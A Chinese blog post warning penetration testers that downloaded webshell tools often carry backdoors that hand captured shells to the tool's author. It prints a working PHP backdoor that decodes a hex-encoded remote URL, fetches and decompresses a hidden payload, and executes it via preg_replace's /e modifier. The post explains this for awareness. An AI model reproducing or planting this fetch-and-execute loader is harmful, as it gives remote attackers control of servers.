在一些渗透测试中,往往会用到各种大马,小马,一句话,菜刀等等……但是你们有想过这些工具会存在后门吗?
何为webshell
webshell的获取一般要跟大马小马这些挂上一个√(就算是命令执行也需要shell)。webshell简单理解就是网站的一个管理程序,可以上传下载等等一系列操作,而大小马则是这个管理程序的代码。
关于后门
一般存在后门的话,所获得的shell会通过后门发送给箱子,那个箱子就是用来装shell的地方!
举个例子
<?php
error_reporting(0);
session_start();
header(“Content-type:text/html;charset=utf-8”);if(empty($_SESSION[‘api’]))
$_SESSION[‘api’]=substr(file_get_contents(
sprintf(‘%s?%s’,pack(“H*”,
‘687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace(“~(.*)~ies”,gzuncompress($_SESSION[‘api’]),null);
?>
这里我们主要看
sprintf(‘%s?%s’,pack(“H*”,’687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())
这串代码看起来可能平平无奇,但是执行过后其实是一张箱子的图片地址,这个地址我就不放出来了,有兴趣的可以自己搭建解密!这个图片还需要调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码。然后,shell就被装进箱子里了。
黑吃黑是怎么形成的
其实网络安全圈子里定义一直模糊,有人兢兢业业挖洞,做src;有人背地里干违法勾当,赚黑心钱。天天在群里秀,挖洞的一部分人就会想
同样是技术,那凭什么我的付出和收入没有他做一单高?就受不住诱惑投入黑产了。殊不知在群里秀的那群人,早已喝茶去了……
极少数违法分子就觉得自己挖太危险了,重新换个思路:
提供大小马之类的工具,再写上一句免责声明,加个后门,想着坐等shell进账出售,出了事也不会被追究。毕竟后门代码一般小白还真不会去管,他们胆子大,技术差。这里奉劝萌新小白们别做事不经大脑思考,盲目炫技最后只能进去喝透心凉茶!!!
这伙人写好了后门,疯狂推广,进账,然后被抓…
“违法犯罪得事一定不能做!”
这就是黑吃黑产业链了,他们背后链接的产业咋们下期再说!
也希望各位网络安全爱好者,同行,且行且珍惜,莫做违法事!制作不易点个赞再走吧!靓仔!
文章版权声明
1 原创文章作者:汇维网,如若转载,请注明出处: https://www.52hwl.com/743.html
2 温馨提示:软件侵权请联系469472785#qq.com(三天内删除相关链接)资源失效请留言反馈
3 下载提示:如遇蓝奏云无法访问,请修改lanzous(把s修改成x)
4 免责声明:本站为个人博客,所有软件信息均来自网络 修改版软件,加群广告提示为修改者自留,非本站信息,注意鉴别